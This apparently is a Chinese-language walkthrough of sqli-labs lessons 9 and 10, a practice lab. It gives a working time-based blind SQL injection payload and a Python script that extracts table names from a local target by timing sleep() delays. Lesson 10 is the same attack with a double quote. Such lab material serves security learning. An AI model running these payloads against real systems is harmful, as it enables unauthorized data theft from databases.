less 9
get方法单引号绕过时间盲注
这关是时间盲注,因为无论是对还是错,回显都是you are in,为了区分,我们可以用sleep()函数,错误的时候返回就会延时,方便我们判断
payload是?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sleep(5))--+
这个是获得数据库名的,剩下的跟之前的差不多,就不写出来了,至于脚本,只贴一个爆表的好了
#coding:utf-8
import requests
import time,datetime
char = "abcdefghijklmnopqrstuvwxyz0123456789~*/\{}?!:@_"
print("start!")
for i in range(0,25):
table = ""
for j in range(1,10):
for str in char:
time1 = datetime.datetime.now()
res = requests.get("http://localhost/sqli-labs-master/sqli-labs-master/Less-9/?id=1%%27and%%20if(mid((select%%20table_name%%20from%%20information_schema.tables%%20where%%20table_schema=database()%%20limit%%20%s,1),%s,1)=%%27%s%%27,sleep(5),0)--+"%(i,j,str))
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec>2:
print(str)
table += str
break
print(table)
less 10
get方法双引号绕过时间盲注
这关跟less 9其实一样的,只是注入的时候把单引号改成双引号就可以了,具体就不讲了